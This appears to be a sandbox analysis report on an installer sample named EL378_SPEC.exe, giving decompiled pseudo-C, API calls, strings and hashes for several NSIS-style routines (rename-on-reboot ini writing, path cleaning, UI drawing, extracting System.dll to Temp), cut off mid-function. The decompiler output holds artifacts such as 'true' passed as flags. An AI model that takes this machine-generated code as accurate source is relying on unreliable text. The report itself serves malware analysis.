Uniqueness

Uniqueness Score: -1.00%

Function 00406306 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 124
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00406306() {
				long _t10;
				void* _t32;
				void* _t36;
				long _t37;
				intOrPtr* _t39;
				void* _t43;
				WCHAR* _t44;
				long _t46;
				int _t48;
				void* _t49;

				_t44 =  *(_t49 + 0x14);
				 *0x4319c0 = 0x55004e;
				 *0x4319c4 = 0x4c;
				if(_t44 == 0) {
					L3:
					_t10 = GetShortPathNameW( *(_t49 + 0x1c), 0x4311c0, 0x400);
					if(_t10 != 0 && _t10 <= 0x400) {
						_t48 = wsprintfA(0x430dc0, "%ls=%ls\r\n", 0x4319c0, 0x4311c0);
						_push( *((intOrPtr*)( *0x435a10 + 0x128)));
						_push(0x4311c0);
						E00405EBA();
						_t10 = E0040691B(0x4311c0, "true", "true");
						_t32 = _t10;
						if(_t32 != 0xffffffff) {
							_t46 = GetFileSize(_t32, 0);
							_t4 = _t48 + 0xa; // 0xa
							_t35 = _t4 + _t46;
							_t43 = GlobalAlloc("true", _t4 + _t46);
							if(_t43 != 0 && E00406948(_t35, _t32, _t43, _t46) != 0) {
								if(E00406B36(_t43, "[Rename]\r\n") != 0) {
									_t36 = E00406B36(_t16 + 0xa, "\n[");
									if(_t36 == 0) {
										goto L10;
									} else {
										_t39 = _t43 + _t46;
										while(_t39 > _t36) {
											 *((char*)(_t39 + _t48)) =  *_t39;
											_t39 = _t39 - 1;
										}
										_t37 = _t36 - _t43 + 1;
										goto L11;
									}
									goto L13;
								} else {
									lstrcpyA(_t43 + _t46, "[Rename]\r\n");
									_t46 = _t46 + 0xa;
									L10:
									_t37 = _t46;
								}
								L11:
								E004066B4(_t37 + _t43, 0x430dc0, _t48);
								SetFilePointer(_t32, 0, 0, 0);
								E00406A0B(_t37, _t32, _t43, _t46 + _t48);
								GlobalFree(_t43);
							}
							_t10 = CloseHandle(_t32);
						}
					}
				} else {
					CloseHandle(E0040691B(_t44, 0, "true"));
					_t10 = GetShortPathNameW(_t44, 0x4319c0, 0x400);
					if(_t10 != 0 && _t10 <= 0x400) {
						goto L3;
					}
				}
				L13:
				return _t10;
			}

0x00406309
0x00406312
0x00406321
0x00406334
0x0040635c
0x00406367
0x0040636b
0x00406394
0x00406396
0x0040639c
0x0040639d
0x004063aa
0x004063af
0x004063b4
0x004063c3
0x004063c5
0x004063c8
0x004063d3
0x004063d7
0x004063f2
0x0040644f
0x00406453
0x00000000
0x00406455
0x00406455
0x00406460
0x0040645c
0x0040645f
0x0040645f
0x00406466
0x00000000
0x00406466
0x00000000
0x004063f4
0x004063fd
0x00406403
0x00406406
0x00406406
0x00406406
0x00406408
0x00406412
0x0040641d
0x00406429
0x0040642f
0x0040642f
0x00406436
0x00406436
0x004063b4
0x00406336
0x00406341
0x0040634a
0x0040634e
0x00000000
0x00000000
0x0040634e
0x0040643c
0x00406440

APIs

CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,0040625E,?,?), ref: 00406341
GetShortPathNameW.KERNEL32(00000000,004319C0,00000400), ref: 0040634A
GetShortPathNameW.KERNEL32(?,004311C0,00000400), ref: 00406367
wsprintfA.USER32 ref: 00406385
GetFileSize.KERNEL32(00000000,00000000,004311C0,C0000000,?,004311C0,?), ref: 004063BD
GlobalAlloc.KERNEL32(?,0000000A), ref: 004063CD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063FD
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00430DC0,00000000,-0000000A,00409984,00000000,[Rename],00000000,00000000,00000000), ref: 0040641D
GlobalFree.KERNEL32(00000000), ref: 0040642F
CloseHandle.KERNEL32(00000000), ref: 00406436

Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\EL378_SPEC.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

Strings

%ls=%ls, xrefs: 0040637B
[Rename], xrefs: 004063E5, 004063F4

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2900126502-461813615
Opcode ID: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
Instruction ID: 3caf73f0ff98a748f1a35ad4b0faf92cdaa7f83aa24985268d6d9c0dc650f438
Opcode Fuzzy Hash: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
Instruction Fuzzy Hash: C93105B12012117AE7206B258D99FAB3A5CEF45748F16053AF903F62D3E63D9C11867C

Uniqueness

Uniqueness Score: -1.00%

Function 00402BD5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00402BD5(void* __eax, void* __ebp, void* _a4, void* _a12, int _a16, void* _a20, WCHAR* _a24, int _a28, void* _a32, void* _a36, void* _a40, long _a44, void* _a52, void* _a64) {
				void* _v20;
				WCHAR* _t28;
				WCHAR* _t31;
				void* _t33;
				void* _t35;

				_t35 = __ebp;
				_push(_t28);
				_t31 = E0040691B();
				_a24 = _t31;
				if(_t31 != 0xffffffff) {
					__eax = _a52;
					 *(__esp + 0x44) = _a52;
					if( *((intOrPtr*)(__esp + 0x30)) != __ebp) {
						__eax =  *0x435a08;
						_a28 = __eax;
						__esi = __eax;
						_a32 = __esi;
						if(__esi == 0) {
							__eax =  *(__esp + 0x44);
						} else {
							E00403131(__ebp) = E0040311B(__esi, _a24);
							__edi = GlobalAlloc("true", _a44);
							_a64 = __edi;
							if(__edi != 0) {
								__eax = E00403148(_a52, __ebp, __edi,  *((intOrPtr*)(__esp + 0x30)));
								if( *__edi != 0) {
									do {
										__esi =  *__edi;
										__eax =  *(__edi + 4);
										__edi = __edi + 8;
										__eax = E004066B4(__eax, __edi, __esi);
										__edi = __edi + __esi;
									} while ( *__edi != 0);
									__esi = _a32;
								}
								__eax = GlobalFree( *(__esp + 0x44));
							}
							__edi = _a36;
							__eax = E00406A0B(__ecx, __edi, __esi, _a28);
							GlobalFree(__esi) = __eax | 0xffffffff;
						}
					}
					_a16 = __eax;
					__eax = CloseHandle(__edi);
				}
				_t33 = 0xfffffff3;
				if(_a32 >= _t35) {
					_t28 = _a24;
				} else {
					_t33 = 0xffffffef;
					DeleteFileW(_t28);
					_t28 = 1;
				}
				_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
				_push(_t33);
				E00405D3A();
				 *0x435ac8 =  *0x435ac8 + _t28;
				return 0;
			}

0x00402bd5
0x00402bd6
0x00402bdc
0x00402bde
0x00402be5
0x00402beb
0x00402bef
0x00402bf7
0x00402bfd
0x00402c05
0x00402c0f
0x00402c11
0x00402c17
0x00402c9f
0x00402c1d
0x00402c28
0x00402c39
0x00402c3b
0x00402c41
0x00402c4d
0x00402c55
0x00402c59
0x00402c59
0x00402c5b
0x00402c5e
0x00402c66
0x00402c6b
0x00402c6d
0x00402c76
0x00402c76
0x00402c7e
0x00402c7e
0x00402c88
0x00402c8e
0x00402c9a
0x00402c9a
0x00402c17
0x00402cad
0x00402cb1
0x00402cb1
0x00402cb9
0x00402cbe
0x00402ccf
0x00402cc0
0x00402cc2
0x00402cc4
0x00402ccc
0x00402ccc
0x00402cd3
0x00402cd8
0x00402345
0x00402ea5
0x00402eb7

APIs

Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\EL378_SPEC.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

GlobalAlloc.KERNEL32(?,?), ref: 00402C09

Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402C33
GlobalFree.KERNEL32(?), ref: 00402C7E
GlobalFree.KERNEL32(00000000), ref: 00402C94

Part of subcall function 00403148: GetTickCount.KERNEL32 ref: 004031B6
Part of subcall function 00403148: GetTickCount.KERNEL32 ref: 0040326A
Part of subcall function 00403148: MulDiv.KERNEL32(?,?,?), ref: 0040329A
Part of subcall function 00403148: wsprintfW.USER32 ref: 004032AB

CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402CB1
DeleteFileW.KERNEL32 ref: 00402CC4

Strings

C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll, xrefs: 00402CD3

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
String ID: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll
API String ID: 2082585436-3464575948
Opcode ID: 9182dff63f84e50a1e90b73517d762f40d436387081faf18bb353ce9dbbd7550
Instruction ID: 31a96b6ed49e7cf7dc87f6fd308bd86f84d8b7abbd45d7da98b877d26c8f5725
Opcode Fuzzy Hash: 9182dff63f84e50a1e90b73517d762f40d436387081faf18bb353ce9dbbd7550
Instruction Fuzzy Hash: 3431F171408351AFD300AF65CE48E1FBBE8AFC9714F10092EF591772D1C37888018BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406D3D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406D3D(WCHAR* _a4) {
				signed short _t5;
				signed int _t8;
				signed int _t9;
				signed short _t18;
				signed short _t20;
				signed int _t21;
				signed short _t22;
				WCHAR* _t23;
				WCHAR* _t24;
				void* _t25;
				WCHAR* _t26;

				_t24 = _a4;
				_push("true");
				_pop(_t22);
				_t5 =  *_t24 & 0x0000ffff;
				_t20 = _t5;
				if(_t5 == _t22) {
					_t20 = _t22;
					if(_t24[1] == _t22 && _t24[2] == 0x3f && _t24[3] == _t22) {
						_t24 =  &(_t24[4]);
						_t20 =  *_t24 & 0x0000ffff;
					}
				}
				_t18 = _t20 & 0x0000ffff;
				if(_t20 != 0) {
					_t18 = _t20 & 0x0000ffff;
					if(E00406E03(_t24) != 0) {
						_t24 =  &(_t24[2]);
						_t18 =  *_t24 & 0x0000ffff;
					}
				}
				_t26 = _t24;
				_t23 = _t24;
				if(_t18 == 0) {
					L14:
					_push("true");
					 *_t23 = 0;
					_pop(_t25);
					while(1) {
						_push(_t23);
						_push(_t26);
						_t23 = CharPrevW();
						_t8 =  *_t23 & 0x0000ffff;
						if(_t8 != 0x20 && _t8 != _t25) {
							break;
						}
						_t8 = 0;
						 *_t23 = 0;
						if(_t26 < _t23) {
							continue;
						}
						break;
					}
					return _t8;
				} else {
					_t9 = _t18 & 0x0000ffff;
					do {
						if(_t9 > 0x1f &&  *((short*)(E004065F6(L"*?|<>/\":", _t9))) == 0) {
							E004066B4(_t23, _t24, CharNextW(_t24) - _t24 >> 1);
							_t23 = CharNextW(_t23);
						}
						_t24 = CharNextW(_t24);
						_t21 =  *_t24 & 0x0000ffff;
						_t9 = _t21;
					} while (_t21 != 0);
					goto L14;
				}
			}

0x00406d40
0x00406d45
0x00406d47
0x00406d48
0x00406d4b
0x00406d50
0x00406d52
0x00406d58
0x00406d67
0x00406d6a
0x00406d6a
0x00406d58
0x00406d6d
0x00406d73
0x00406d76
0x00406d80
0x00406d82
0x00406d85
0x00406d85
0x00406d80
0x00406d88
0x00406d8a
0x00406d8f
0x00406dd4
0x00406dd6
0x00406dd8
0x00406ddb
0x00406ddc
0x00406ddc
0x00406ddd
0x00406de4
0x00406de6
0x00406dec
0x00000000
0x00000000
0x00406df3
0x00406df5
0x00406dfa
0x00000000
0x00000000
0x00000000
0x00406dfa
0x00406e00
0x00406d91
0x00406d91
0x00406d9a
0x00406d9e
0x00406dbb
0x00406dc3
0x00406dc3
0x00406dc8
0x00406dca
0x00406dcd
0x00406dcf
0x00000000
0x00406d9a

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DB2
CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DC6
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DDE

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D44
C:\Users\user\AppData\Local\Temp\, xrefs: 00406D3D, 00406D3F
*?|<>/":, xrefs: 00406DA1

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-2188270913
Opcode ID: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
Instruction ID: 9b03febb742ef4485f2caa0616bf8b5dba6ff04d2a2b11022b5674ddd7f14081
Opcode Fuzzy Hash: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
Instruction Fuzzy Hash: 4E110211B0022566DA306B2A9C4097B72E8DFA9761746443BF9C6A32C0F77D8CA1D2B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040575B Relevance: 12.1, APIs: 8, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040575B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				void* _t38;
				signed char _t40;
				signed char _t42;
				long _t51;
				long _t52;
				long* _t55;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					_t38 = 0;
				} else {
					_t55 = GetWindowLongW(_a12, 0xffffffeb);
					if(_t55 == 0 || _t55[2] > 1 || _t55[4] > 2) {
						goto L18;
					} else {
						_t40 = _t55[5];
						if((_t40 & 0xffffffe0) != 0) {
							goto L18;
						} else {
							_t51 =  *_t55;
							if((_t40 & 0x00000002) != 0) {
								_t51 = GetSysColor(_t51);
								_t40 = _t55[5];
							}
							if((_t40 & 0x00000001) != 0) {
								SetTextColor(_a8, _t51);
							}
							SetBkMode(_a8, _t55[4]);
							_t42 = _t55[5];
							_t52 = _t55[1];
							_v16.lbColor = _t52;
							if((_t42 & 0x00000008) != 0) {
								_t52 = GetSysColor(_t52);
								_t42 = _t55[5];
								_v16.lbColor = _t52;
							}
							if((_t42 & 0x00000004) != 0) {
								SetBkColor(_a8, _t52);
								_t42 = _t55[5];
							}
							if((_t42 & 0x00000010) != 0) {
								_v16.lbStyle = _t55[2];
								if(_t55[3] != 0) {
									DeleteObject(_t55[3]);
								}
								_t55[3] = CreateBrushIndirect( &_v16);
							}
							_t38 = _t55[3];
						}
					}
				}
				return _t38;
			}

0x0040576d
0x0040582e
0x0040582e
0x00405773
0x0040577e
0x00405782
0x00000000
0x0040579c
0x0040579c
0x004057a4
0x00000000
0x004057aa
0x004057aa
0x004057ae
0x004057b7
0x004057b9
0x004057b9
0x004057be
0x004057c4
0x004057c4
0x004057d0
0x004057d6
0x004057d9
0x004057dc
0x004057e1
0x004057ea
0x004057ec
0x004057ef
0x004057ef
0x004057f4
0x004057fa
0x00405800
0x00405800
0x00405805
0x0040580e
0x00405811
0x00405816
0x00405816
0x00405826
0x00405826
0x00405829
0x00405829
0x004057a4
0x00405782
0x00405832

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00405778
GetSysColor.USER32 ref: 004057B1
SetTextColor.GDI32(?), ref: 004057C4
SetBkMode.GDI32(?,?), ref: 004057D0
GetSysColor.USER32(?), ref: 004057E4
SetBkColor.GDI32(?,?), ref: 004057FA
DeleteObject.GDI32(?), ref: 00405816
CreateBrushIndirect.GDI32(?), ref: 00405820

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
Instruction ID: d6878141ad4b6a1f495ba237af706d2ee8e98f75713b616aff0e98366caa8665
Opcode Fuzzy Hash: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
Instruction Fuzzy Hash: 64210775600B059FDB34AF28E94895B7BF8EF05710700CA3AE896A27A1D735EC14CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004056DA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056DA(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t18;
				unsigned int _t22;
				signed int _t28;

				_t18 = SendMessageW(_a4, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t18;
					_v60 = 4;
					SendMessageW(_a4, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t22 = GetMessagePos();
				_v16 = _t22 >> 0x10;
				_v20 = _t22;
				ScreenToClient(_a4,  &_v20);
				_t28 = SendMessageW(_a4, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t18 = _v8;
					goto L4;
				}
				return _t28 | 0xffffffff;
			}

0x004056f3
0x004056f9
0x00405739
0x00405739
0x0040574a
0x00405751
0x00000000
0x00405753
0x004056fb
0x00405708
0x00405712
0x00405715
0x00405729
0x0040572f
0x00405736
0x00000000
0x00405736
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056F3
GetMessagePos.USER32 ref: 004056FB
ScreenToClient.USER32(?,?), ref: 00405715
SendMessageW.USER32(?,00001111,00000000,?), ref: 00405729
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405751

Strings

f, xrefs: 0040572B

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
Instruction ID: c2e7ed3a8a7ffde0c91d4cd6f33517ea70e65294e07f2b992d5a249d380e7f5b
Opcode Fuzzy Hash: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
Instruction Fuzzy Hash: 01014C7190020DBBEB119FA4CC45BEEBBB9EB44720F104226FA51B61E0D7B59A419F54

Uniqueness

Uniqueness Score: -1.00%

Function 00401FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00401FB8(struct HWND__* __edx, intOrPtr _a8, struct HWND__* _a24, intOrPtr _a36, signed char _a48) {
				void* _v12;
				int _t7;
				intOrPtr _t13;
				intOrPtr _t22;
				signed char _t26;
				struct HDC__* _t29;
				void* _t35;

				_t29 = GetDC(__edx);
				_t7 = E00403002(2);
				0x40d908->lfHeight =  ~(MulDiv(_t7, GetDeviceCaps(_t29, 0x5a), "true"));
				ReleaseDC(_a24, _t29);
				_t13 = E00403002(3);
				_t26 = _a48;
				_push(_a36);
				 *0x40d918 = _t13;
				 *0x40d91f = 1;
				 *0x40d91c = _t26 & 0x00000001;
				_push("Calibri");
				 *0x40d91d = _t26 & 0x00000002;
				 *0x40d91e = _t26 & 0x00000004;
				E00405EBA();
				_push(CreateFontIndirectW(0x40d908));
				_push(_a8);
				E0040661F();
				_t22 =  *((intOrPtr*)(_t35 + 0x10));
				 *0x435ac8 =  *0x435ac8 + _t22;
				return 0;
			}

0x00401fc1
0x00401fc3
0x00401fe0
0x00401feb
0x00401ff3
0x00401ff9
0x00401ffd
0x00402001
0x0040200a
0x00402011
0x0040201d
0x00402022
0x00402027
0x0040202d
0x00402041
0x00402042
0x004016b7
0x00402ea1
0x00402ea5
0x00402eb7

APIs

GetDC.USER32 ref: 00401FB9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
ReleaseDC.USER32(?,00000000), ref: 00401FEB

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

CreateFontIndirectW.GDI32(0040D908), ref: 00402037

Strings

Calibri, xrefs: 0040201D

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcat
String ID: Calibri
API String ID: 4253744674-1409258342
Opcode ID: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
Instruction ID: 19ee21ee25b481e0e115610c7b0d21c914cbbc44bdafb393b7f83238122b1e8a
Opcode Fuzzy Hash: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
Instruction Fuzzy Hash: 4B01D4B6905340AFD300AFB4AD0AB563FA8ABA9705F10483DF641B71E2C6784709CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040364F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040364F(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t18;

				if(_a8 != 0x110) {
					if(_a8 == 0x113) {
						goto L3;
					}
				} else {
					SetTimer(_a4, "true", 0xfa, 0);
					L3:
					_t18 =  *0x40d968; // 0x923b8
